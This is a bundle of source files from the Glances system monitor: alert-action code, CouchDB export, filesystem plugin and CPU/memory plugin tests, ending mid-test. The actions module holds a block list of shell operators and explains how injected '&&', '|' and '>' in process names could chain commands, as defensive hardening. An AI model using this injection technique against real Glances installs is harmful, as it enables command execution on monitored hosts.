            # allow_operators=False => '>' is a literal argument, no file written
            assert not os.path.exists(marker)
        finally:
            if os.path.exists(marker):
                os.unlink(marker)



#
# This file is part of Glances.
#
# SPDX-FileCopyrightText: 2022 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Manage on alert actions."""

from glances.logger import logger
from glances.secure import secure_popen
from glances.timer import Timer

try:
    import chevron
except ImportError:
    logger.debug("Chevron library not found (action scripts won't work)")
    chevron_tag = False
else:
    chevron_tag = True

# Characters that secure_popen interprets as shell operators.
# Mustache-rendered values must not contain these to prevent command injection.
#
# A lone '&' is included even though it is not itself an operator: when two
# adjacent unescaped Mustache variables ({{{a}}}{{{b}}} / {{&a}}{{&b}}) are
# rendered next to each other, a trailing '&' from the first value and a leading
# '&' from the second join into a real '&&' *after* per-field sanitization, which
# secure_popen would then interpret as a command chain (GHSA-qcpp-8x79-hhp3,
# incomplete fix of CVE-2026-32608). Stripping the lone '&' from each value
# removes the operator character on both sides of the variable boundary, so no
# operator can be reconstructed across it. The multi-character operators stay
# first so '&&'/'>>' collapse to a single space (stable whitespace, no double
# strip).
_SHELL_OPERATORS = ('&&', '|', '>>', '>', '&')


def _sanitize_value(value):
    """Replace shell operators by spaces in a string, recursing into containers.

    Strings are sanitized; lists, tuples and dicts are walked so that nested
    attacker-controlled values (most notably a process ``cmdline``, exposed as a
    list of argv set by the attacker) are sanitized too. Other types (int,
    float, bool, None) are returned unchanged.

    Recursing is required: the top-level-only check left nested values
    exploitable (GHSA-73wf-9vmv-5pv9, incomplete fix of CVE-2026-32608). The
    Mustache renderer does not HTML-escape '|', so an unsanitized pipe in a
    nested value would survive into secure_popen and be interpreted.
    """
    if isinstance(value, str):
        for op in _SHELL_OPERATORS:
            value = value.replace(op, ' ')
        return value
    if isinstance(value, (list, tuple)):
        return type(value)(_sanitize_value(item) for item in value)
    if isinstance(value, dict):
        return {k: _sanitize_value(v) for k, v in value.items()}
    return value


def _sanitize_mustache_dict(mustache_dict):
    """Return a copy of mustache_dict with shell operators replaced by spaces.

    This prevents command injection when user-controllable data (process names,
    container names, mount points, etc.) is rendered into action command lines
    via Mustache templates. Sanitization is recursive so that strings nested in
    lists or dicts are covered, not only top-level string values.
    """
    if not mustache_dict:
        return mustache_dict

    return {k: _sanitize_value(v) for k, v in mustache_dict.items()}


class GlancesActions:
    """This class manage action if an alert is reached."""

    def __init__(self, args=None):
        """Init GlancesActions class."""
        # Keep a reference to args to honor --disable-config-exec (see run())
        self.args = args

        # Dict with the criticality status
        # - key: stat_name
        # - value: criticality
        # Goal: avoid to execute the same command twice
        self.status = {}

        # Add a timer to avoid any trigger when Glances is started (issue#732)
        # Action can be triggered after refresh * 2 seconds
        if hasattr(args, 'time'):
            self.start_timer = Timer(args.time * 2)
        else:
            self.start_timer = Timer(3)

    def allow_operators(self):
        """Return False when config-sourced command operators must be disabled.

        Mirrors --disable-config-exec: when the user hardened config-driven
        command execution, the on-alert action command lines (read from the same
        glances.conf file as the AMP commands) must not let secure_popen
        interpret the shell operators (&&, |, >). Otherwise an attacker able to
        edit glances.conf could chain commands or write to an arbitrary file via
        the redirection operator (GHSA-59fj-m2j6-hcxh, incomplete fix of
        GHSA-3vwc-qwhc-3mj7 / CVE-2026-53925).
        """
        return not getattr(self.args, 'disable_config_exec', False)

    def get(self, stat_name):
        """Get the stat_name criticality."""
        try:
            return self.status[stat_name]
        except KeyError:
            return None

    def set(self, stat_name, criticality):
        """Set the stat_name to criticality."""
        self.status[stat_name] = criticality

    def run(self, stat_name, criticality, commands, repeat, mustache_dict=None):
        """Run the commands (in background).

        :param stat_name: plugin_name (+ header)
        :param criticality: criticality of the trigger
        :param commands: a list of command line with optional {{mustache}}
        :param repeat: If True, then repeat the action
        :param  mustache_dict: Plugin stats (can be use within {{mustache}})

        :return: True if the commands have been ran.
        """
        if (self.get(stat_name) == criticality and not repeat) or not self.start_timer.finished():
            # Action already executed => Exit
            return False

        logger.debug(
            "{} action {} for {} ({}) with stats {}".format(
                "Repeat" if repeat else "Run", commands, stat_name, criticality, mustache_dict
            )
        )

        # Run all actions in background
        for cmd in commands:
            # Replace {{arg}} by the dict one (Thk to {Mustache})
            if chevron_tag:
                # Sanitize mustache values to prevent shell operator injection
                safe_dict = _sanitize_mustache_dict(mustache_dict)
                cmd_full = chevron.render(cmd, safe_dict)
            else:
                cmd_full = cmd
            # Execute the action
            logger.info(f"Action triggered for {stat_name} ({criticality}): {cmd_full}")
            try:
                ret = secure_popen(cmd_full, allow_operators=self.allow_operators())
            except OSError as e:
                logger.error(f"Action error for {stat_name} ({criticality}): {e}")
            else:
                logger.debug(f"Action result for {stat_name} ({criticality}): {ret}")

        self.set(stat_name, criticality)

        return True



#
# This file is part of Glances.
#
# SPDX-FileCopyrightText: 2022 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""CouchDB interface class."""

#
# How to test ?
#
# 1) docker run -d -e COUCHDB_USER=admin -e COUCHDB_PASSWORD=admin -p 5984:5984 --name my-couchdb couchdb
# 2) .venv/bin/python -m glances -C ./conf/glances.conf --export couchdb --quiet
# 3) Result can be seen at: http://127.0.0.1:5984/_utils
#

import sys
from datetime import datetime

import pycouchdb

from glances.exports.export import GlancesExport
from glances.logger import logger


class Export(GlancesExport):
    """This class manages the CouchDB export module."""

    def __init__(self, config=None, args=None):
        """Init the CouchDB export IF."""
        super().__init__(config=config, args=args)

        # Load the CouchDB configuration file section
        # User and Password are mandatory with CouchDB 3.0 and higher
        self.export_enable = self.load_conf('couchdb', mandatories=['host', 'port', 'db', 'user', 'password'])
        if not self.export_enable:
            sys.exit(2)

        # Init the CouchDB client
        self.client = self.init()

    def init(self):
        """Init the connection to the CouchDB server."""
        if not self.export_enable:
            return None

        # @TODO: https
        server_uri = f'http://{self.user}:{self.password}@{self.host}:{self.port}/'

        try:
            s = pycouchdb.Server(server_uri)
        except Exception as e:
            logger.critical(f"Cannot connect to CouchDB server ({e})")
            sys.exit(2)
        else:
            logger.info("Connected to the CouchDB server version {}".format(s.info()['version']))

        try:
            s.database(self.db)
        except Exception:
            # Database did not exist
            # Create it...
            s.create(self.db)
            logger.info(f"Create CouchDB database {self.db}")
        else:
            logger.info(f"CouchDB database {self.db} already exist")

        return s.database(self.db)

    def export(self, name, columns, points):
        """Write the points to the CouchDB server."""
        logger.debug(f"Export {name} stats to CouchDB")

        # Create DB input
        data = dict(zip(columns, points))

        # Add the type and the timestamp in ISO format
        data['type'] = name
        data['time'] = datetime.now().isoformat()[:-3] + 'Z'

        # Write data to the CouchDB database
        try:
            self.client.save(data)
        except Exception as e:
            logger.error(f"Cannot export {name} stats to CouchDB ({e})")



#
# This file is part of Glances.
#
# SPDX-FileCopyrightText: 2024 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""File system plugin."""

import operator

import psutil

from glances.globals import PermissionError, exit_after, nativestr, u
from glances.logger import logger
from glances.plugins.plugin.model import GlancesPluginModel

# Fields description
# description: human readable description
# short_name: shortname to use un UI
# unit: unit type
# rate: is it a rate ? If yes, // by time_since_update when displayed,
# min_symbol: Auto unit should be used if value > than 1 'X' (K, M, G)...
fields_description = {
    'device_name': {'description': 'Device name.'},
    'fs_type': {'description': 'File system type.'},
    'mnt_point': {'description': 'Mount point.'},
    'options': {'description': 'Mount options.'},
    'size': {
        'description': 'Total size.',
        'unit': 'byte',
    },
    'used': {
        'description': 'Used size.',
        'unit': 'byte',
    },
    'free': {
        'description': 'Free size.',
        'unit': 'byte',
    },
    'percent': {
        'description': 'File system usage in percent.',
        'unit': 'percent',
    },
}

# SNMP OID
# The snmpd.conf needs to be edited.
# Add the following to enable it on all disk
# ...
# includeAllDisks 10%
# ...
# The OIDs are as follows (for the first disk)
# Path where the disk is mounted: .1.3.6.1.4.1.2021.9.1.2.1
# Path of the device for the partition: .1.3.6.1.4.1.2021.9.1.3.1
# Total size of the disk/partition (kBytes): .1.3.6.1.4.1.2021.9.1.6.1
# Available space on the disk: .1.3.6.1.4.1.2021.9.1.7.1
# Used space on the disk: .1.3.6.1.4.1.2021.9.1.8.1
# Percentage of space used on disk: .1.3.6.1.4.1.2021.9.1.9.1
# Percentage of inodes used on disk: .1.3.6.1.4.1.2021.9.1.10.1
snmp_oid = {
    'default': {
        'mnt_point': '1.3.6.1.4.1.2021.9.1.2',
        'device_name': '1.3.6.1.4.1.2021.9.1.3',
        'size': '1.3.6.1.4.1.2021.9.1.6',
        'used': '1.3.6.1.4.1.2021.9.1.8',
        'percent': '1.3.6.1.4.1.2021.9.1.9',
    },
    'windows': {
        'mnt_point': '1.3.6.1.2.1.25.2.3.1.3',
        'alloc_unit': '1.3.6.1.2.1.25.2.3.1.4',
        'size': '1.3.6.1.2.1.25.2.3.1.5',
        'used': '1.3.6.1.2.1.25.2.3.1.6',
    },
    'netapp': {
        'mnt_point': '1.3.6.1.4.1.789.1.5.4.1.2',
        'device_name': '1.3.6.1.4.1.789.1.5.4.1.10',
        'size': '1.3.6.1.4.1.789.1.5.4.1.3',
        'used': '1.3.6.1.4.1.789.1.5.4.1.4',
        'percent': '1.3.6.1.4.1.789.1.5.4.1.6',
    },
}
snmp_oid['esxi'] = snmp_oid['windows']

# Define the history items list
# All items in this list will be historised if the --enable-history tag is set
items_history_list = [{'name': 'percent', 'description': 'File system usage in percent', 'y_unit': '%'}]


@exit_after(2, default=None)
def get_disk_usage(fs):
    """Return all partitions."""
    try:
        return psutil.disk_usage(fs.mountpoint)
    except OSError:
        # Disk is ejected during the command
        logger.debug("Plugin - fs: PsUtil fetch failed")
        return None


class FsPlugin(GlancesPluginModel):
    """Glances file system plugin.

    stats is a list
    """

    def __init__(self, args=None, config=None):
        """Init the plugin."""
        super().__init__(
            args=args,
            config=config,
            items_history_list=items_history_list,
            stats_init_value=[],
            fields_description=fields_description,
        )

        # We want to display the stat in the curse interface
        self.display_curse = True

    def get_key(self):
        """Return the key of the list."""
        return 'mnt_point'

    @GlancesPluginModel._check_decorator
    @GlancesPluginModel._log_result_decorator
    def update(self):
        """Update the FS stats using the input method."""
        # Update the stats
        if self.input_method == 'local':
            stats = self.update_local()
        else:
            stats = self.get_init_value()

        # Update the stats
        self.stats = stats

        return self.stats

    def get_disk_partitions(self, *, fetch_all: bool = False):
        """Return all partitions."""
        try:
            # Grab the stats using the psutil disk_partitions
            # If fetch_all is False, then returns physical devices only (e.g. hard disks, cd-rom drives, USB keys)
            # and ignore all others (e.g. memory partitions such as /dev/shm)
            # Else return all mount points (including logical mount points like NFS, tmpfs, shm, ...)
            return psutil.disk_partitions(all=fetch_all)
        except (UnicodeDecodeError, PermissionError):
            logger.debug("Plugin - fs: PsUtil fetch failed")
            return []

    def update_local(self):
        """Update the FS stats using the input method."""
        # Init new stats
        stats = self.get_init_value()

        # Update stats using the standard system lib
        fs_stat = self.get_disk_partitions()

        # Optional hack to allow logical mounts points (issue #448)
        allowed_fs_types = self.get_conf_value('allow')
        if allowed_fs_types:
            # Avoid Psutil call unless mounts need to be allowed
            all_mounted_fs = self.get_disk_partitions(fetch_all=True)
            # Discard duplicates (#2299) and add entries matching allowed fs types
            tracked_mnt_points = {f.mountpoint for f in fs_stat}
            for f in all_mounted_fs:
                if (
                    any(f.fstype.find(fs_type) >= 0 for fs_type in allowed_fs_types)
                    and f.mountpoint not in tracked_mnt_points
                ):
                    fs_stat.append(f)

        # Loop over fs
        for fs in fs_stat:
            # Hide the stats if the mount point is in the exclude list
            # It avoids unnecessary call to PsUtil disk_usage
            if not self.is_display_any(fs.mountpoint, fs.device):
                continue

            # Grab the disk usage
            fs_usage = get_disk_usage(fs)
            if fs_usage is None:
                continue
            fs_current = {
                'device_name': fs.device,
                'fs_type': fs.fstype,
                # Manage non breaking space (see issue #1065)
                'mnt_point': u(fs.mountpoint).replace('\u00a0', ' '),
                'options': fs.opts,
                'size': fs_usage.total,
                'used': fs_usage.used,
                'free': fs_usage.free,
                'percent': fs_usage.percent,
                'key': self.get_key(),
            }

            # Add alias if exist (define in the configuration file)
            if self.has_alias(fs_current['mnt_point']) is not None:
                fs_current['alias'] = self.has_alias(fs_current['mnt_point'])

            stats.append(fs_current)

        return stats

    def update_snmp(self):
        """Update the FS stats using the input method."""
        # Init new stats
        stats = self.get_init_value()

        # Update stats using SNMP

        # SNMP bulk command to get all file system in one shot
        try:
            fs_stat = self.get_stats_snmp(snmp_oid=snmp_oid[self.short_system_name], bulk=True)
        except KeyError:
            fs_stat = self.get_stats_snmp(snmp_oid=snmp_oid['default'], bulk=True)

        # Loop over fs
        if self.short_system_name in ('windows', 'esxi'):
            # Windows or ESXi tips
            for fs, fs_value in fs_stat.item():
                # Do not take hidden file system into account
                if not self.is_display(fs):
                    continue

                # Memory stats are grabbed in the same OID table (ignore it)
                if fs == 'Virtual Memory' or fs == 'Physical Memory' or fs == 'Real Memory':
                    continue
                size = int(fs_value['size']) * int(fs_value['alloc_unit'])
                used = int(fs_value['used']) * int(fs_value['alloc_unit'])
                percent = float(used * 100 / size)
                fs_current = {
                    'device_name': '',
                    'mnt_point': fs.partition(' ')[0],
                    'options': '',
                    'size': size,
                    'used': used,
                    'percent': percent,
                    'key': self.get_key(),
                }
                stats.append(fs_current)
        else:
            # Default behavior
            for fs, fs_value in fs_stat.item():
                # Do not take hidden file system into account
                if not self.is_display_any(fs, fs_value['device_name']):
                    continue

                fs_current = {
                    'device_name': fs_value['device_name'],
                    'mnt_point': fs,
                    'options': '',
                    'size': int(fs_value['size']) * 1024,
                    'used': int(fs_value['used']) * 1024,
                    'percent': float(fs_value['percent']),
                    'key': self.get_key(),
                }
                stats.append(fs_current)

        return stats

    def update_views(self):
        """Update stats views."""
        # Call the father's method
        super().update_views()

        # Add specifics information
        # Alert
        # Do not display threshold for volume mounted in 'ro' (read-only) #3143
        for i in [d for d in self.stats if 'ro' not in d.get('options', '').split(',')]:
            if i[self.get_key()] in self.views:
                self.views[i[self.get_key()]]['used']['decoration'] = self.get_alert(
                    current=i['size'] - i['free'], maximum=i['size'], header=i['mnt_point']
                )

    def msg_curse(self, args=None, max_width=None):
        """Return the dict to display in the curse interface."""
        # Init the return message
        ret = []

        # Only process if stats exist and display plugin enable...
        if not self.stats or self.is_disabled():
            return ret

        # Max size for the interface name
        if max_width:
            name_max_width = max_width - 13
        else:
            # No max_width defined, return an empty curse message
            logger.debug(f"No max_width defined for the {self.plugin_name} plugin, it will not be displayed.")
            return ret

        # Build the string message
        # Header
        msg = '{:{width}}'.format('FILE SYS', width=name_max_width)
        ret.append(self.curse_add_line(msg, "TITLE"))
        if args and args.fs_free_space:
            msg = '{:>8}'.format('Free')
        else:
            msg = '{:>8}'.format('Used')
        ret.append(self.curse_add_line(msg))
        msg = '{:>7}'.format('Total')
        ret.append(self.curse_add_line(msg))

        # Filesystem list (sorted by name)
        for i in sorted(self.stats, key=operator.itemgetter(self.get_key())):
            # New line
            ret.append(self.curse_new_line())
            mnt_point = i['alias'] if 'alias' in i else i['mnt_point']
            if len(mnt_point) + len(i['device_name'].split('/')[-1]) <= name_max_width - 3:
                # If possible concatenate mode info... Glances touch inside :)
                mnt_point += ' (' + i['device_name'].split('/')[-1] + ')'
            elif len(mnt_point) > name_max_width:
                mnt_point = mnt_point[:name_max_width] + '_'
            msg = '{:{width}}'.format(nativestr(mnt_point), width=name_max_width + 1)
            ret.append(self.curse_add_line(msg))
            if args and args.fs_free_space:
                msg = '{:>7}'.format(self.auto_unit(i['free']))
            else:
                msg = '{:>7}'.format(self.auto_unit(i['used']))
            ret.append(
                self.curse_add_line(msg, self.get_views(item=i[self.get_key()], key='used', option='decoration'))
            )
            msg = '{:>7}'.format(self.auto_unit(i['size']))
            ret.append(self.curse_add_line(msg))

        return ret



#!/usr/bin/env python
#
# Glances - An eye on your system
#
# SPDX-FileCopyrightText: 2024 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Tests for the CPU plugin."""

import json
import time

import pytest

from glances.globals import WINDOWS


@pytest.fixture
def cpu_plugin(glances_stats):
    """Return the CPU plugin instance from glances_stats."""
    return glances_stats.get_plugin('cpu')


class TestCpuPluginBasics:
    """Test basic CPU plugin functionality."""

    def test_plugin_name(self, cpu_plugin):
        """Test plugin name is correctly set."""
        assert cpu_plugin.plugin_name == 'cpu'

    def test_plugin_is_enabled(self, cpu_plugin):
        """Test that the plugin is enabled by default."""
        assert cpu_plugin.is_enabled() is True

    def test_display_curse_enabled(self, cpu_plugin):
        """Test that curse display is enabled."""
        assert cpu_plugin.display_curse is True

    def test_history_items_defined(self, cpu_plugin):
        """Test that history items are properly defined."""
        items = cpu_plugin.get_items_history_list()
        assert items is not None
        assert len(items) >= 2
        item_names = [item['name'] for item in items]
        assert 'user' in item_names
        assert 'system' in item_names


class TestCpuPluginUpdate:
    """Test CPU plugin update functionality."""

    def test_update_returns_dict(self, cpu_plugin):
        """Test that update returns a dictionary."""
        cpu_plugin.update()
        stats = cpu_plugin.get_raw()
        assert isinstance(stats, dict)

    def test_update_contains_mandatory_keys(self, cpu_plugin):
        """Test that stats contain mandatory keys."""
        cpu_plugin.update()
        stats = cpu_plugin.get_raw()
        mandatory_keys = ['total', 'system', 'user', 'idle']
        for key in mandatory_keys:
            assert key in stats, f"Missing mandatory key: {key}"

    def test_cpu_percentages_in_valid_range(self, cpu_plugin):
        """Test that CPU percentages are within valid range."""
        cpu_plugin.update()
        stats = cpu_plugin.get_raw()
        percentage_keys = ['total', 'system', 'user', 'idle']
        for key in percentage_keys:
            if key in stats and stats[key] is not None:
                assert 0 <= stats[key] <= 100, f"{key} percentage out of range: {stats[key]}"

    def test_total_cpu_calculation(self, cpu_plugin):
        """Test that total CPU is correctly calculated."""
        cpu_plugin.update()
        stats = cpu_plugin.get_raw()
        assert 'total' in stats
        assert stats['total'] >= 0

    def test_cpucore_count(self, cpu_plugin):
        """Test that CPU core count is reported."""
        cpu_plugin.update()
        stats = cpu_plugin.get_raw()
        assert 'cpucore' in stats
        assert stats['cpucore'] >= 1


class TestCpuPluginContextSwitches:
    """Test CPU context switches and interrupts stats."""

    def test_ctx_switches_present(self, cpu_plugin):
        """Test that context switches stat is present."""
        cpu_plugin.update()
        time.sleep(0.1)
        cpu_plugin.update()
        stats = cpu_plugin.get_raw()
        assert 'ctx_switches' in stats

    def test_interrupts_present(self, cpu_plugin):
        """Test that interrupts stat is present."""
        cpu_plugin.update()
        time.sleep(0.1)
        cpu_plugin.update()
        stats = cpu_plugin.get_raw()
        assert 'interrupts' in stats

    @pytest.mark.skipif(WINDOWS, reason="soft_interrupts not available on Windows")
    def test_soft_interrupts_present(self, cpu_plugin):
        """Test that soft interrupts stat is present on non-Windows."""
        cpu_plugin.update()
        time.sleep(0.1)
        cpu_plugin.update()
        stats = cpu_plugin.get_raw()
        assert 'soft_interrupts' in stats


class TestCpuPluginViews:
    """Test CPU plugin views functionality."""

    def test_update_views_creates_views(self, cpu_plugin):
        """Test that update_views creates views dictionary."""
        cpu_plugin.update()
        cpu_plugin.update_views()
        views = cpu_plugin.get_views()
        assert isinstance(views, dict)

    def test_views_contain_decoration(self, cpu_plugin):
        """Test that views contain decoration for total CPU."""
        cpu_plugin.update()
        cpu_plugin.update_views()
        views = cpu_plugin.get_views()
        assert 'total' in views
        assert 'decoration' in views['total']


class TestCpuPluginJSON:
    """Test CPU plugin JSON serialization."""

    def test_get_stats_returns_json(self, cpu_plugin):
        """Test that get_stats returns valid JSON."""
        cpu_plugin.update()
        stats_json = cpu_plugin.get_stats()
        parsed = json.loads(stats_json)
        assert isinstance(parsed, dict)

    def test_json_contains_expected_fields(self, cpu_plugin):
        """Test that JSON output contains expected fields."""
        cpu_plugin.update()
        stats_json = cpu_plugin.get_stats()
        parsed = json.loads(stats_json)
        assert 'total' in parsed
        assert 'user' in parsed
        assert 'system' in parsed


class TestCpuPluginHistory:
    """Test CPU plugin history functionality."""

    def test_history_enable_check(self, cpu_plugin):
        """Test that history_enable returns a boolean."""
        result = cpu_plugin.history_enable()
        assert isinstance(result, bool)

    def test_get_items_history_list(self, cpu_plugin):
        """Test that get_items_history_list returns the history items."""
        items = cpu_plugin.get_items_history_list()
        if items is not None:
            assert isinstance(items, list)
            assert len(items) >= 2


class TestCpuPluginReset:
    """Test CPU plugin reset functionality."""

    def test_reset_clears_stats(self, cpu_plugin):
        """Test that reset clears stats."""
        cpu_plugin.update()
        cpu_plugin.reset()
        stats = cpu_plugin.get_raw()
        assert stats == cpu_plugin.get_init_value()

    def test_reset_views(self, cpu_plugin):
        """Test that reset_views clears views."""
        cpu_plugin.update()
        cpu_plugin.update_views()
        cpu_plugin.reset_views()
        assert cpu_plugin.get_views() == {}


class TestCpuPluginFieldsDescription:
    """Test CPU plugin fields description."""

    def test_fields_description_exists(self, cpu_plugin):
        """Test that fields_description is defined."""
        assert cpu_plugin.fields_description is not None

    def test_mandatory_fields_described(self, cpu_plugin):
        """Test that mandatory fields have descriptions."""
        mandatory_fields = ['total', 'system', 'user', 'idle']
        for field in mandatory_fields:
            assert field in cpu_plugin.fields_description

    def test_field_has_description(self, cpu_plugin):
        """Test that each field has a description."""
        for field, info in cpu_plugin.fields_description.items():
            assert 'description' in info, f"Field {field} missing description"


class TestCpuPluginAlerts:
    """Test CPU plugin alert functionality."""

    def test_get_alert_returns_valid_status(self, cpu_plugin):
        """Test that get_alert returns a valid status."""
        cpu_plugin.update()
        alert = cpu_plugin.get_alert(50, minimum=0, maximum=100, header='total')
        valid_statuses = [
            'OK',
            'OK_LOG',
            'CAREFUL',
            'CAREFUL_LOG',
            'WARNING',
            'WARNING_LOG',
            'CRITICAL',
            'CRITICAL_LOG',
            'DEFAULT',
            'MAX',
        ]
        assert any(alert.startswith(status) for status in valid_statuses)

    def test_alert_levels(self, cpu_plugin):
        """Test different alert levels based on CPU usage."""
        cpu_plugin.update()
        # Low usage should be OK
        alert_low = cpu_plugin.get_alert(10, minimum=0, maximum=100, header='total')
        # The result depends on config, but should not be CRITICAL for 10%
        assert not alert_low.startswith('CRITICAL')


class TestCpuPluginMsgCurse:
    """Test CPU plugin curse message generation."""

    def test_msg_curse_returns_list(self, cpu_plugin):
        """Test that msg_curse returns a list."""
        cpu_plugin.update()
        msg = cpu_plugin.msg_curse()
        assert isinstance(msg, list)

    def test_msg_curse_format(self, cpu_plugin):
        """Test that msg_curse returns properly formatted entries."""
        cpu_plugin.update()
        # Ensure args.percpu is not set to get output
        if hasattr(cpu_plugin.args, 'percpu'):
            original_percpu = cpu_plugin.args.percpu
            cpu_plugin.args.percpu = False
        msg = cpu_plugin.msg_curse()
        if msg:  # May be empty if percpu mode or disabled
            for entry in msg:
                assert isinstance(entry, dict)
                assert 'msg' in entry
        if hasattr(cpu_plugin.args, 'percpu'):
            cpu_plugin.args.percpu = original_percpu

    def test_msg_curse_has_title_when_enabled(self, cpu_plugin):
        """Test that msg_curse contains CPU title when not in percpu mode."""
        cpu_plugin.update()
        if hasattr(cpu_plugin.args, 'percpu'):
            original_percpu = cpu_plugin.args.percpu
            cpu_plugin.args.percpu = False
        msg = cpu_plugin.msg_curse()
        if msg:
            messages = [m.get('msg', '') for m in msg]
            assert any('CPU' in str(m) for m in messages)
        if hasattr(cpu_plugin.args, 'percpu'):
            cpu_plugin.args.percpu = original_percpu



#!/usr/bin/env python
#
# Glances - An eye on your system
#
# SPDX-FileCopyrightText: 2024 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Tests for the Memory plugin."""

import json

import pytest


@pytest.fixture
def mem_plugin(glances_stats):
    """Return the Memory plugin instance from glances_stats."""
    return glances_stats.get_plugin('mem')


class TestMemPluginBasics:
    """Test basic Memory plugin functionality."""

    def test_plugin_name(self, mem_plugin):
        """Test plugin name is correctly set."""
        assert mem_plugin.plugin_name == 'mem'

    def test_plugin_is_enabled(self, mem_plugin):
        """Test that the plugin is enabled by default."""
        assert mem_plugin.is_enabled() is True

    def test_display_curse_enabled(self, mem_plugin):
        """Test that curse display is enabled."""
        assert mem_plugin.display_curse is True

    def test_history_items_defined(self, mem_plugin):
        """Test that history items are properly defined."""
        items = mem_plugin.get_items_history_list()
        assert items is not None
        item_names = [item['name'] for item in items]
        assert 'percent' in item_names


class TestMemPluginUpdate:
    """Test Memory plugin update functionality."""

    def test_update_returns_dict(self, mem_plugin):
        """Test that update returns a dictionary."""
        mem_plugin.update()
        stats = mem_plugin.get_raw()
        assert isinstance(stats, dict)

    def test_update_contains_mandatory_keys(self, mem_plugin):
        """Test that stats contain mandatory keys."""
        mem_plugin.update()
        stats = mem_plugin.get_raw()
        mandatory_keys = ['total', 'available', 'used', 'free', 'percent']
        for key in mandatory_keys:
            assert key in stats, f"Missing mandatory key: {key}"

    def test_memory_values_positive(self, mem_plugin):
        """Test that memory values are positive."""
        mem_plugin.update()
        stats = mem_plugin.get_raw()
        for key in ['total', 'available', 'used', 'free']:
            if key in stats and stats[key] is not None:
                assert stats[key] >= 0, f"{key} should be non-negative"

    def test_memory_percent_in_valid_range(self, mem_plugin):
        """Test that memory percentage is within valid range."""
        mem_plugin.update()
        stats = mem_plugin.get_raw()
        assert 'percent' in stats
        assert 0 <= stats['percent'] <= 100

    def test_used_plus_free_less_than_total(self, mem_plugin):
        """Test that used + available approximately equals total."""
        mem_plugin.update()
        stats = mem_plugin.get_raw()
        if all(key in stats for key in ['used', 'available', 'total']):
            # Allow for some rounding/calculation variance
            calculated = stats['used'] + stats['available']
            # Should be close to total (within 10% due to different calculation methods)
            assert abs(calculated - stats['total']) / stats['total'] < 0.1

    def test_total_memory_reasonable(self, mem_plugin):
        """Test that total memory is a reasonable value (> 100MB)."""
        mem_plugin.update()
        stats = mem_plugin.get_raw()
        min_memory = 100 * 1024 * 1024  # 100 MB
        assert stats['total'] > min_memory


class TestMemPluginOptionalFields:
    """Test Memory plugin optional fields."""

    def test_active_inactive_memory(self, mem_plugin):
        """Test active/inactive memory fields if available."""
        mem_plugin.update()
        stats = mem_plugin.get_raw()
        # These are platform-specific, so just check they're valid if present
        if 'active' in stats and stats['active'] is not None:
            assert stats['active'] >= 0
        if 'inactive' in stats and stats['inactive'] is not None:
            assert stats['inactive'] >= 0

    def test_buffers_cached_memory(self, mem_plugin):
        """Test buffers/cached memory fields if available."""
        mem_plugin.update()
        stats = mem_plugin.get_raw()
        if 'buffers' in stats and stats['buffers'] is not None:
            assert stats['buffers'] >= 0
        if 'cached' in stats and stats['cached'] is not None:
            assert stats['cached'] >= 0


class TestMemPluginViews:
    """Test Memory plugin views functionality."""

    def test_update_views_creates_views(self, mem_plugin):
        """Test that update_views creates views dictionary."""
        mem_plugin.update()
        mem_plugin.update_views()
        views = mem_plugin.get_views()
        assert isinstance(views, dict)

    def test_views_contain_percent_decoration(self, mem_plugin):
        """Test that views contain decoration for percent."""
        mem_plugin.update()
        mem_plugin.update_views()
        views = mem_plugin.get_views()
        if views:
            assert 'percent' in views
            assert 'decoration' in views['percent']


class TestMemPluginJSON:
    """Test Memory plugin JSON serialization."""

    def test_get_stats_returns_json(self, mem_plugin):
        """Test that get_stats returns valid JSON."""
        mem_plugin.update()
        stats_json = mem_plugin.get_stats()
        parsed = json.loads(stats_json)
        assert isinstance(parsed, dict)

    def test_json_contains_expected_fields(self, mem_plugin):
        """Test that JSON output contains expected fields."""
        mem_plugin.update()
        stats_json = mem_plugin.get_stats()
        parsed = json.loads(stats_json)
        expected_fields = ['total', 'used', 'free', 'percent']
        for field in expected_fields:
            assert field in parsed


class TestMemPluginHistory:
    """Test Memory plugin history functionality."""

    def test_history_enable_check(self, mem_plugin):
        """Test that history_enable returns a boolean."""
        result = mem_plugin.history_enable()
        assert isinstance(result, bool)

    def test_get_items_history_list(self, mem_plugin):
        """Test that get_items_history_list returns the history items."""
        items = mem_plugin.get_items_history_list()
        if items is not None:
            assert isinstance(items, list)
            item_names = [item['name'] for item in items]
            assert 'percent' in item_names


class TestMemPluginReset:
    """Test Memory plugin reset functionality."""

    def test_reset_clears_stats(self, mem_plugin):
        """Test that reset clears stats."""
        mem_plugin.update()
        mem_plugin.reset()
        stats = mem_plugin.get_raw()
        assert stats == mem_plugin.get_init_value()

    def test_reset_views(self, mem_plugin):
        """Test that reset_views clears views."""
        mem_plugin.update()
        mem_plugin.update_views()
        mem_plugin.reset_views()
        assert mem_plugin.get_views() == {}


class TestMemPluginFieldsDescription:
    """Test Memory plugin fields description."""

    def test_fields_description_exists(self, mem_plugin):
        """Test that fields_description is defined."""
        assert mem_plugin.fields_description is not None

    def test_mandatory_fields_described(self, mem_plugin):
        """Test that mandatory fields have descriptions."""
        mandatory_fields = ['total', 'available', 'percent', 'used', 'free']
        for field in mandatory_fields:
            assert field in mem_plugin.fields_description

    def test_field_has_description(self, mem_plugin):
        """Test that each field has a description."""
        for field, info in mem_plugin.fields_description.items():
            assert 'description' in info, f"Field {field} missing description"

    def test_field_has_unit(self, mem_plugin):
        """Test that byte fields have unit defined."""
        byte_fields = ['total', 'available', 'used', 'free']
        for field in byte_fields:
            if field in mem_plugin.fields_description:
                assert 'unit' in mem_plugin.fields_description[field]


class TestMemPluginAlerts:
    """Test Memory plugin alert functionality."""

    def test_get_alert_log_returns_valid_status(self, mem_plugin):
        """Test that get_alert_log returns a valid status."""
        mem_plugin.update()
        stats = mem_plugin.get_raw()
        if 'used' in stats and 'total' in stats:
            alert = mem_plugin.get_alert_log(stats['used'], maximum=stats['total'])
            valid_statuses = [
                'OK',
                'OK_LOG',
                'CAREFUL',
                'CAREFUL_LOG',
                'WARNING',
                'WARNING_LOG',
                'CRITICAL',
